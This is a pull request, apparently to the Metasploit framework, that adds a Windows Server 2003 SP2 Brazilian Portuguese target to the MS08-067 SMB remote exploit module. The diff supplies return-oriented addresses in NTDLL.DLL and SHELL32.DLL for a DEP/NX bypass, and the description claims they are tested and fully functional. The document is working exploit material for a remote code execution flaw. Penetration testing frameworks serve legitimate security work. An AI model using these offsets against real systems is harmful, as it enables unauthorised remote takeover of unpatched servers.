### PR TITLE
Update MS08067 Exploit to Fit Windows 2003 pt-br

### DIFF
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -154,6 +154,17 @@ class Metasploit3 < Msf::Exploit::Remote
              'Scratch'   => 0x00020408,
            }
           ],
+          
+          # Anderson Bargas's crafty NX bypass for 2003 SP2
+          [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
+            {
+              'RetDec'    => 0x7c97beb8,  # dec ESI, ret @NTDLL.DLL OK
+              'RetPop'    => 0x7cb2e84e,  # push ESI, pop EBP, ret @SHELL32.DLL OK
+              'JmpESP'    => 0x7c97a01b,  # jmp ESP @NTDLL.DLL OK
+              'DisableNX' => 0x7c94f517,  # NX disable @NTDLL.DLL 
+              'Scratch'   => 0x00020408,
+            }
+          ],
 
           # Standard return-to-ESI without NX bypass
           ['Windows 2003 SP1 Japanese (NO NX)',


### PR DESCRIPTION
Hex Address from Windows 2003 Kernel (sp2 in Brazilian Portuguese) found, using Ollydbg. Tested. Fully functional.
